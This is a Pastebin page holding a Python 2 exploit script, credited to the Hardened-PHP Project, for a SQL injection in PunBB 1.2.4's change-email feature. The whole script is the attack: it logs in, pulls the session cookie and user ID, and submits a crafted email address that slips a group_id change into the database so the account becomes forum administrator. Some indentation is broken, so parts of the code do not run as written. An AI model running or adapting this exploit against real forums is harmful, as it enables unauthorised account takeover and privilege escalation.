Advertisement
FlyFar

Exploit.Python.PunBB.a - Source Code

Jun 26th, 2023
745
1
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.12 KB | Cybersecurity | 1 0
  1. #!/usr/bin/python
  2. #######################################################################
  3. #  _  _                _                     _       ___  _  _  ___
  4. # | || | __ _  _ _  __| | ___  _ _   ___  __| | ___ | _ \| || || _ \
  5. # | __ |/ _` || '_|/ _` |/ -_)| ' \ / -_)/ _` ||___||  _/| __ ||  _/
  6. # |_||_|\__,_||_|  \__,_|\___||_||_|\___|\__,_|     |_|  |_||_||_|  
  7. #                                                        
  8. #######################################################################
  9. #         Proof of concept code from the Hardened-PHP Project
  10. #######################################################################
  11. #
  12. #                           -= PunBB 1.2.4 =-
  13. #                   change_email SQL injection exploit
  14. #
  15. #  user-supplied data within the database is still user-supplied data
  16. #
  17. #######################################################################
  18.  
  19. import urllib
  20. import getopt
  21. import sys
  22. import string
  23.  
  24. __argv__ = sys.argv
  25.  
  26. def banner():
  27.     print "PunBB 1.2.4 - change_email SQL injection exploit"
  28.     print "Copyright (C) 2005 Hardened-PHP Project\n"
  29.  
  30. def usage():
  31.     banner()
  32.     print "Usage:\n"
  33.     print "   $ ./punbb_change_email.py [options]\n"
  34.     print "        -h http_url   url of the punBB forum to exploit"
  35.     print "                      f.e. http://www.forum.net/punBB/"
  36.     print "        -u username   punBB forum useraccount"
  37.     print "        -p password   punBB forum userpassword"
  38.     print "        -e email      email address where the admin leve activation email is sent"
  39.     print "        -d domain     catch all domain to catch \"some-SQL-Query\"@domain emails"
  40.     print ""
  41.     sys.exit(-1)
  42.  
  43. def main():
  44.     try:
  45.         opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
  46.     except getopt.GetoptError:
  47.         usage()
  48.  
  49.     if len(__argv__) < 10:
  50.         usage()
  51.        
  52.     username = None
  53.     password = None
  54.     email = None
  55.     domain = None
  56.     host = None
  57.     for o, arg in opts:
  58.         if o == "-h":
  59.         host = arg
  60.         if o == "-u":
  61.             username = arg
  62.         if o == "-p":
  63.             password = arg
  64.         if o == "-e":
  65.             email = arg
  66.         if o == "-d":
  67.             domain = arg
  68.    
  69.     # Printout banner
  70.     banner()
  71.    
  72.     # Check if everything we need is there
  73.     if host == None:
  74.         print "[-] need a host to connect to"
  75.     sys.exit(-1)
  76.     if username == None:
  77.         print "[-] username needed to continue"
  78.         sys.exit(-1)
  79.     if password == None:
  80.         print "[-] password needed to continue"
  81.         sys.exit(-1)
  82.     if email == None:
  83.         print "[-] email address needed to continue"
  84.         sys.exit(-1)
  85.     if domain == None:
  86.         print "[-] catch all domain needed to continue"
  87.     sys.exit(-1)
  88.    
  89.     # Retrive cookie
  90.     params = {
  91.         'req_username' : username,
  92.     'req_password' : password,
  93.     'form_sent' : 1
  94.     }
  95.    
  96.     wclient = urllib.URLopener()
  97.    
  98.     print "[+] Connecting to retrieve cookie"
  99.    
  100.     req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
  101.     info = req.info()
  102.     if 'set-cookie' not in info:
  103.         print "[-] Unable to retrieve cookie... something is wrong"
  104.         sys.exit(-3)
  105.     cookie = info['set-cookie']
  106.     cookie = cookie[:string.find(cookie, ';')]
  107.     print "[+] Cookie found - extracting user_id"
  108.     user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
  109.     print "[+] User-ID: %d" % (int(user_id))
  110.     wclient.addheader('Cookie', cookie);
  111.    
  112.     email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, '@')+1:] + ',"\','
  113.     append = 'group_id=\'1'
  114.     email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
  115.    
  116.     params = {
  117.         'req_new_email' : email,
  118.     'form_sent' : 1
  119.     }
  120.  
  121.     print "[+] Connecting to request change email"        
  122.     req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, urllib.urlencode(params))        
  123.  
  124.     print "[+] Done... Now wait for the email. Log into punBB, go to the link in the email and become admin"
  125.  
  126. if __name__ == "__main__":
  127.     main()
  128.  
  129.  
  130.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement